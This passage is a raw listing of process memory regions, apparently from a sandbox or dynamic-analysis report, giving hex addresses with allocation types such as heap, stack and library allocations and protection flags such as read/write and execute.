unkown
page read and write
338E000
stack
page read and write
98C0000
trusted library allocation
page read and write
4CE0000
heap
page read and write
9630000
trusted library allocation
page read and write
99C6000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
52C2000
direct allocation
page read and write
9910000
trusted library allocation
page read and write
3619000
heap
page read and write
88C5000
trusted library allocation
page read and write
99C0000
trusted library allocation
page read and write
362D000
unkown
page read and write
8830000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
A650000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
9960000
trusted library allocation
page read and write
2138FDA0000
heap
page read and write
9750000
trusted library allocation
page read and write
86E000
stack
page read and write
27B5DD20000
heap
page read and write
87A0000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
99A0000
trusted library allocation
page read and write
205650FB000
heap
page read and write
A97E000
stack
page read and write
3615000
heap
page read and write
187C728C000
heap
page read and write
87A0000
trusted library allocation
page read and write
98C0000
unkown
page read and write
9A10000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
6CD2C7E000
stack
page read and write
3417000
heap
page read and write
A9BD000
stack
page read and write
9B90000
trusted library allocation
page read and write
20565890000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
8700000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
7A20000
trusted library allocation
page read and write
363B000
heap
page read and write
64C2000
trusted library allocation
page read and write
97D0000
unkown
page read and write
9740000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
53B0000
trusted library allocation
page read and write
2056A864000
heap
page read and write
A5E0000
trusted library allocation
page read and write
8744000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
77C0000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
4D4E000
heap
page read and write
5D68000
trusted library allocation
page read and write
9A20000
trusted library allocation
page read and write
74C0000
trusted library section
page read and write
95F0000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
9965000
trusted library allocation
page read and write
6CD218B000
stack
page read and write
87A0000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
2138FE00000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
B660000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
87A5000
unkown
page read and write
9960000
trusted library allocation
page read and write
8870000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
9BD8000
trusted library allocation
page read and write
8315000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
281D000
direct allocation
page read and write
88C0000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
88D5000
trusted library allocation
page read and write
74D0000
trusted library allocation
page read and write
99F0000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
7700000
trusted library allocation
page read and write
49F0000
heap
page read and write
88A5000
trusted library allocation
page read and write
21390986000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
9814000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
7FC10000
unkown
page read and write
8380000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
9650000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
7703000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
BB62000
trusted library allocation
page read and write
2D3AB466000
heap
page read and write
586F000
stack
page read and write
9700000
trusted library allocation
page read and write
82BA000
trusted library allocation
page read and write
9B35000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
99C0000
trusted library allocation
page read and write
4D05000
heap
page read and write
340E000
stack
page read and write
98DF000
stack
page read and write
A620000
trusted library allocation
page read and write
A5C0000
trusted library allocation
page execute and read and write
4662000
trusted library allocation
page read and write
99C0000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
9772000
trusted library allocation
page read and write
95AE000
stack
page read and write
96C0000
trusted library allocation
page read and write
4D12000
heap
page read and write
9475000
trusted library allocation
page read and write
B6E0000
trusted library allocation
page execute and read and write
B3F0000
trusted library allocation
page read and write
B3F7000
trusted library allocation
page read and write
9748000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
7700000
trusted library allocation
page read and write
8890000
trusted library allocation
page execute and read and write
9610000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
9BF0000
trusted library allocation
page execute and read and write
95D0000
trusted library allocation
page read and write
27B5DE13000
heap
page read and write
9A10000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
9B50000
trusted library allocation
page read and write
2309000
direct allocation
page read and write
20565C01000
trusted library allocation
page read and write
53D6000
heap
page read and write
7640000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
9770000
trusted library allocation
page read and write
8750000
trusted library allocation
page read and write
3610000
heap
page read and write
95F0000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
468D000
trusted library allocation
page read and write
9900000
trusted library allocation
page read and write
187C722E000
heap
page read and write
9BD0000
trusted library allocation
page read and write
54A0000
heap
page read and write
9810000
trusted library allocation
page read and write
363F000
heap
page read and write
9960000
trusted library allocation
page read and write
48A000
unkown
page read and write
7760000
trusted library allocation
page read and write
3A0000
heap
page read and write
95D0000
trusted library allocation
page read and write
7630000
trusted library allocation
page read and write
187C725E000
heap
page read and write
3547000
stack
page read and write
187C7190000
trusted library allocation
page read and write
8331000
trusted library allocation
page read and write
9670000
trusted library allocation
page read and write
9A20000
trusted library allocation
page read and write
9AD3000
trusted library allocation
page read and write
2056A8EE000
heap
page read and write
1C908FB000
stack
page read and write
97C0000
trusted library allocation
page read and write
A5E0000
trusted library allocation
page read and write
22F1000
direct allocation
page execute read
74C0000
trusted library allocation
page read and write
5360000
heap
page read and write
468B000
trusted library allocation
page read and write
44EC000
unkown
page read and write
9850000
trusted library allocation
page read and write
629B7FB000
stack
page read and write
8740000
trusted library allocation
page read and write
9860000
trusted library allocation
page read and write
74C0000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
9C6F000
unkown
page read and write
99C0000
trusted library allocation
page read and write
74B0000
trusted library allocation
page read and write
98C8000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
2056AAF0000
remote allocation
page read and write
469F000
trusted library allocation
page read and write
650000
heap
page read and write
9760000
trusted library allocation
page read and write
9AB0000
unkown
page read and write
B413000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
27B5DE25000
heap
page read and write
BB94000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
9A90000
trusted library allocation
page read and write
97C1000
trusted library allocation
page read and write
8870000
trusted library allocation
page read and write
9830000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
9670000
trusted library allocation
page read and write
99C2000
trusted library allocation
page read and write
52A4000
direct allocation
page read and write
3644000
heap
page read and write
9950000
trusted library allocation
page read and write
33C0000
heap
page read and write
9630000
trusted library allocation
page read and write
76E0000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
2AA0000
heap
page read and write
97D0000
trusted library allocation
page read and write
5A73000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
76F3000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
97C2000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
4CB0000
heap
page read and write
372A000
unkown
page read and write
95D0000
trusted library allocation
page read and write
BB6B000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
2862000
heap
page read and write
99F4000
trusted library allocation
page read and write
9830000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
74E0000
trusted library allocation
page read and write
884E000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
A00000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
8750000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
5AB5000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
4D90000
heap
page read and write
B7C3000
trusted library allocation
page read and write
59F5000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
BB83000
trusted library allocation
page read and write
9AA0000
trusted library allocation
page read and write
BE38000
trusted library allocation
page read and write
9900000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
8870000
trusted library allocation
page read and write
2F0E000
unkown
page read and write
9860000
trusted library allocation
page read and write
96C5000
trusted library allocation
page read and write
9820000
trusted library allocation
page execute and read and write
2056A800000
heap
page read and write
8270000
trusted library allocation
page read and write
344B000
heap
page read and write
BC05000
trusted library allocation
page read and write
1AFA6502000
heap
page read and write
88C0000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
A610000
trusted library allocation
page read and write
95E000
stack
page read and write
9820000
trusted library allocation
page read and write
CA2D8FE000
stack
page read and write
88A0000
trusted library allocation
page read and write
9A43000
trusted library allocation
page read and write
9900000
trusted library allocation
page read and write
27B5DD90000
heap
page read and write
99F5000
trusted library allocation
page read and write
187C7100000
heap
page read and write
95D0000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
2138FCB1000
heap
page read and write
A5E0000
trusted library allocation
page read and write
4290000
trusted library allocation
page read and write
4E70000
heap
page read and write
82E000
stack
page read and write
98E0000
trusted library allocation
page read and write
5A40000
trusted library allocation
page read and write
7710000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
8840000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
BB41000
trusted library allocation
page read and write
223A2457000
heap
page read and write
95E0000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
8343000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
99B0000
trusted library allocation
page read and write
5399000
heap
page read and write
88C0000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
98B0000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
9860000
trusted library allocation
page read and write
BCE5000
trusted library allocation
page read and write
2D3AB429000
heap
page read and write
8850000
trusted library allocation
page read and write
30000
heap
page read and write
9610000
trusted library allocation
page read and write
99B0000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
A5F0000
trusted library allocation
page read and write
2F30000
heap
page read and write
98E0000
unkown
page read and write
97E0000
unkown
page read and write
9630000
unkown
page read and write
9A6E000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
4470000
heap
page read and write
2C5E000
heap
page read and write
74C0000
trusted library allocation
page read and write
20565B13000
heap
page read and write
9710000
trusted library allocation
page read and write
7760000
trusted library allocation
page read and write
9860000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
A5E0000
trusted library allocation
page read and write
9B75000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
9C30000
trusted library allocation
page read and write
7745000
trusted library allocation
page read and write
53F6000
heap
page read and write
7730000
trusted library allocation
page read and write
A5E3000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
63B247F000
stack
page read and write
88D5000
trusted library allocation
page read and write
8410000
direct allocation
page read and write
99C0000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
74E2000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
88D5000
unkown
page read and write
99C0000
trusted library allocation
page read and write
88C5000
trusted library allocation
page read and write
7A80000
heap
page read and write
27B5DE3B000
heap
page read and write
9940000
trusted library allocation
page read and write
53D1000
direct allocation
page read and write
4CCA000
heap
page read and write
20565B02000
heap
page read and write
D68D56B000
stack
page read and write
87A0000
trusted library allocation
page read and write
539A000
heap
page read and write
A83E000
stack
page read and write
BBFD000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
9B90000
trusted library allocation
page read and write
9950000
trusted library allocation
page read and write
9B8E000
stack
page read and write
53B2000
heap
page read and write
9630000
unkown
page read and write
99C0000
trusted library allocation
page read and write
8837000
trusted library allocation
page read and write
4CF0000
heap
page read and write
4280000
trusted library allocation
page read and write
5395000
trusted library allocation
page execute and read and write
63C000
stack
page read and write
88D0000
trusted library allocation
page read and write
9990000
trusted library allocation
page read and write
9910000
trusted library allocation
page read and write
A604000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
77D0000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
74B0000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
2056A8F5000
heap
page read and write
2D3AB45E000
heap
page read and write
95F0000
trusted library allocation
page read and write
4B90000
remote allocation
page read and write
9840000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
5364000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
87A9000
unkown
page read and write
97B0000
trusted library allocation
page read and write
51F0000
direct allocation
page read and write
99F0000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
3649000
heap
page read and write
9640000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
9645000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
9650000
trusted library allocation
page read and write
99C0000
trusted library allocation
page read and write
20566140000
trusted library allocation
page read and write
B640000
trusted library allocation
page read and write
4654000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
A600000
trusted library allocation
page read and write
9A00000
unkown
page read and write
7916000
trusted library allocation
page read and write
5230000
direct allocation
page read and write
9620000
trusted library allocation
page read and write
74C0000
trusted library allocation
page read and write
174FA44C000
heap
page read and write
9BD0000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
236C000
unkown
page read and write
8730000
trusted library allocation
page read and write
283A000
direct allocation
page read and write
88C0000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
6B4000
heap
page read and write
176CA7B000
stack
page read and write
4C80000
remote allocation
page read and write
98D0000
trusted library allocation
page read and write
9960000
trusted library allocation
page read and write
D68DDFE000
stack
page read and write
9810000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
2D3AB457000
heap
page read and write
364A000
heap
page read and write
9B40000
trusted library allocation
page read and write
74E0000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
A5E0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
52AF000
direct allocation
page read and write
2C58000
heap
page read and write
4D0C000
heap
page read and write
489000
unkown
page write copy
9A23000
trusted library allocation
page read and write
7A20000
trusted library allocation
page read and write
9830000
trusted library allocation
page read and write
A630000
trusted library allocation
page read and write
7E80000
heap
page read and write
9C00000
trusted library allocation
page read and write
9907000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
A5E0000
trusted library allocation
page read and write
53B0000
direct allocation
page read and write
7901000
trusted library allocation
page read and write
9820000
unkown
page read and write
97C0000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
9962000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
9960000
trusted library allocation
page read and write
2D3AB502000
heap
page read and write
9A20000
trusted library allocation
page read and write
A610000
trusted library allocation
page read and write
88A0000
unkown
page read and write
99E0000
trusted library allocation
page execute and read and write
95D0000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
A610000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
2056A900000
heap
page read and write
9780000
trusted library allocation
page read and write
8276000
trusted library allocation
page read and write
4F3C000
stack
page read and write
9860000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
63B21FB000
stack
page read and write
8740000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
629B8FF000
stack
page read and write
187C70F0000
heap
page read and write
6F0000
heap
page read and write
9BE0000
trusted library allocation
page read and write
2056A7D4000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
9815000
trusted library allocation
page read and write
9B00000
trusted library allocation
page read and write
BB8C000
trusted library allocation
page read and write
99CA000
trusted library allocation
page read and write
27D6000
heap
page read and write
4D4D000
heap
page read and write
B3D0000
trusted library allocation
page read and write
52AF000
direct allocation
page read and write
4D7F000
heap
page read and write
9A40000
trusted library allocation
page read and write
4620000
trusted library allocation
page read and write
9650000
unkown
page read and write
9A00000
trusted library allocation
page read and write
5AFC000
trusted library allocation
page read and write
9650000
trusted library allocation
page read and write
7F800000
unkown
page read and write
99D0000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
20565113000
heap
page read and write
9635000
trusted library allocation
page read and write
8760000
trusted library allocation
page read and write
1AFA6468000
heap
page read and write
A5D0000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
47DE000
stack
page read and write
95F0000
trusted library allocation
page execute and read and write
9810000
trusted library allocation
page read and write
7780000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
8710000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
88D5000
trusted library allocation
page read and write
53A0000
heap
page read and write
8750000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
752E000
stack
page read and write
B3F6000
trusted library allocation
page read and write
4EBE000
stack
page read and write
7920000
trusted library allocation
page read and write
52C0000
heap
page read and write
88A0000
unkown
page read and write
97B0000
trusted library allocation
page read and write
1C90CFC000
stack
page read and write
98D0000
trusted library allocation
page read and write
2056509C000
heap
page read and write
A600000
trusted library allocation
page read and write
5E81000
trusted library allocation
page read and write
27B5DF02000
heap
page read and write
1C9053E000
stack
page read and write
88D0000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
174FA2D0000
heap
page read and write
187C7C02000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
629B779000
stack
page read and write
8867000
trusted library allocation
page read and write
53DF000
heap
page read and write
5E1C000
trusted library allocation
page read and write
7FB50000
unkown
page read and write
885F000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
A5D4000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
7A1E000
stack
page read and write
770D000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
8730000
trusted library allocation
page read and write
7770000
trusted library allocation
page read and write
A93E000
stack
page read and write
9960000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
9940000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
88C5000
trusted library allocation
page read and write
87A8000
unkown
page read and write
1AFA62C0000
heap
page read and write
98D0000
trusted library allocation
page read and write
20566220000
trusted library section
page readonly
95F0000
trusted library allocation
page read and write
99D0000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
9A55000
unkown
page read and write
88C0000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
64B1000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
B429000
trusted library allocation
page read and write
9665000
trusted library allocation
page read and write
99F0000
trusted library allocation
page read and write
53F0000
heap
page read and write
9BE0000
trusted library allocation
page read and write
5DE1000
trusted library allocation
page read and write
77E0000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
B414000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
74B0000
trusted library allocation
page read and write
8710000
trusted library allocation
page read and write
9645000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
9B90000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
9490000
unkown
page read and write
6C60000
direct allocation
page read and write
87A0000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
53F4000
heap
page read and write
9710000
unkown
page read and write
88A7000
unkown
page read and write
97D0000
trusted library allocation
page read and write
5E94000
trusted library allocation
page read and write
5378000
heap
page read and write
9635000
unkown
page read and write
7600000
heap
page execute and read and write
9810000
trusted library allocation
page read and write
9640000
unkown
page read and write
9C60000
trusted library allocation
page read and write
2056AAA0000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
A610000
trusted library allocation
page read and write
87A5000
trusted library allocation
page read and write
2056A889000
heap
page read and write
6C00000
direct allocation
page read and write
88C0000
trusted library allocation
page read and write
7C80000
trusted library allocation
page read and write
187C729C000
heap
page read and write
A5E0000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
64C6000
trusted library allocation
page read and write
63B257F000
stack
page read and write
9840000
trusted library allocation
page read and write
1C904BC000
stack
page read and write
9770000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
187C7229000
heap
page read and write
88C0000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
9B80000
trusted library allocation
page read and write
4D51000
heap
page read and write
9B50000
trusted library allocation
page read and write
97E0000
unkown
page read and write
9840000
trusted library allocation
page read and write
566E000
stack
page read and write
95D0000
trusted library allocation
page read and write
6BC0000
direct allocation
page read and write
3F99000
unkown
page read and write
51B0000
direct allocation
page read and write
4687000
trusted library allocation
page read and write
9815000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
87A0000
unkown
page read and write
9A60000
trusted library allocation
page read and write
2F9C000
stack
page read and write
95E0000
trusted library allocation
page read and write
364A000
heap
page read and write
97C0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
9A6F000
trusted library allocation
page read and write
20564F90000
heap
page read and write
9BD0000
trusted library allocation
page read and write
2138FCEC000
heap
page read and write
8370000
trusted library allocation
page read and write
9BA0000
trusted library allocation
page read and write
4F2E000
stack
page read and write
9850000
trusted library allocation
page read and write
5DC3000
trusted library allocation
page read and write
2800000
direct allocation
page read and write
9640000
unkown
page read and write
9610000
trusted library allocation
page read and write
4D78000
heap
page read and write
9880000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
7A81000
heap
page read and write
9AB0000
unkown
page read and write
87A0000
trusted library allocation
page read and write
5DB2000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
88A3000
trusted library allocation
page read and write
174FA470000
heap
page read and write
97B0000
trusted library allocation
page execute and read and write
9960000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
21390BE0000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
2138FCF5000
heap
page read and write
63C000
stack
page read and write
2D3AB48A000
heap
page read and write
487000
unkown
page read and write
6B20000
heap
page read and write
3430000
trusted library section
page read and write
88A0000
trusted library allocation
page read and write
599A000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
9AD0000
trusted library allocation
page read and write
99D0000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
5D42000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
176C5BE000
stack
page read and write
A5E0000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
A602000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
9BB0000
trusted library allocation
page read and write
B406000
trusted library allocation
page read and write
2056A84D000
heap
page read and write
9A00000
trusted library allocation
page read and write
77B0000
trusted library allocation
page read and write
4D95000
heap
page read and write
9960000
trusted library allocation
page read and write
9960000
trusted library allocation
page read and write
20565A02000
heap
page read and write
9630000
trusted library allocation
page read and write
174FA502000
heap
page read and write
9A20000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
75A0000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
86E0000
trusted library allocation
page read and write
99C0000
trusted library allocation
page read and write
223A246E000
heap
page read and write
9710000
trusted library allocation
page read and write
99B0000
trusted library allocation
page read and write
950000
heap
page read and write
9780000
unkown
page read and write
174FA513000
heap
page read and write
95E0000
trusted library allocation
page read and write
99C0000
trusted library allocation
page read and write
E4602FF000
stack
page read and write
6CD2CFF000
stack
page read and write
BE1D000
trusted library allocation
page read and write
5280000
direct allocation
page read and write
3FE8000
unkown
page read and write
B636000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
9B10000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
539B000
trusted library allocation
page execute and read and write
9770000
trusted library allocation
page read and write
6CE000
heap
page read and write
96C0000
trusted library allocation
page read and write
6CD2BFF000
stack
page read and write
87A0000
trusted library allocation
page read and write
9648000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
187C7288000
heap
page read and write
88A0000
unkown
page read and write
49F8000
heap
page read and write
2056508B000
heap
page read and write
BBE5000
trusted library allocation
page read and write
9A50000
unkown
page read and write
9940000
trusted library allocation
page read and write
285A000
heap
page read and write
2C8E000
unkown
page read and write
9B40000
trusted library allocation
page read and write
9A72000
trusted library allocation
page read and write
53F0000
heap
page read and write
99D0000
trusted library allocation
page read and write
8370000
trusted library allocation
page read and write
BAC4000
trusted library allocation
page read and write
2056505A000
heap
page read and write
48E000
unkown
page write copy
187C7273000
heap
page read and write
2138FB30000
heap
page read and write
B3FA000
trusted library allocation
page read and write
8870000
trusted library allocation
page read and write
96F6000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
3C0000
heap
page read and write
20565067000
heap
page read and write
9B50000
trusted library allocation
page read and write
2056A8DD000
heap
page read and write
9A20000
trusted library allocation
page read and write
9B30000
unkown
page read and write
74B0000
trusted library allocation
page read and write
8450000
direct allocation
page read and write
9830000
trusted library allocation
page read and write
8770000
trusted library allocation
page read and write
8840000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
777D000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
2651000
stack
page read and write
9830000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
9830000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
9B60000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
4D36000
heap
page read and write
8850000
trusted library allocation
page execute and read and write
88C0000
trusted library allocation
page read and write
8820000
trusted library section
page read and write
9645000
trusted library allocation
page read and write
20566250000
trusted library section
page readonly
7670000
trusted library allocation
page read and write
1F0000
trusted library allocation
page read and write
99D0000
unkown
page read and write
A600000
trusted library allocation
page read and write
B406000
trusted library allocation
page read and write
9963000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
174FA43C000
heap
page read and write
8871000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
2895000
heap
page read and write
9815000
trusted library allocation
page read and write
82EC000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
2D3AB469000
heap
page read and write
9940000
trusted library allocation
page read and write
9960000
trusted library allocation
page read and write
223A2270000
heap
page read and write
8820000
trusted library allocation
page read and write
2138FD07000
heap
page read and write
831D000
trusted library allocation
page read and write
5A49000
trusted library allocation
page read and write
4110000
unkown
page read and write
187C723C000
heap
page read and write
9820000
trusted library allocation
page read and write
98B4000
trusted library allocation
page read and write
48E000
unkown
page write copy
2056AA08000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
D68DCFB000
stack
page read and write
2056A902000
heap
page read and write
3550000
trusted library section
page read and write
9BE0000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
97B1000
trusted library allocation
page read and write
76C0000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
2056A8EC000
heap
page read and write
9601000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
B650000
trusted library allocation
page read and write
5450000
heap
page execute and read and write
8850000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
1C90AF7000
stack
page read and write
53D3000
heap
page read and write
9BED000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
76EC000
trusted library allocation
page read and write
4D34000
heap
page read and write
98B0000
trusted library allocation
page read and write
9815000
trusted library allocation
page read and write
95B4000
trusted library allocation
page read and write
3FBD000
unkown
page read and write
8850000
trusted library allocation
page read and write
8730000
trusted library allocation
page read and write
364A000
heap
page read and write
8830000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
4B20000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
187C7213000
heap
page read and write
9A20000
trusted library allocation
page read and write
176C87E000
stack
page read and write
9AD0000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
9960000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
B6D0000
trusted library allocation
page read and write
67C000
stack
page read and write
76C0000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
4646000
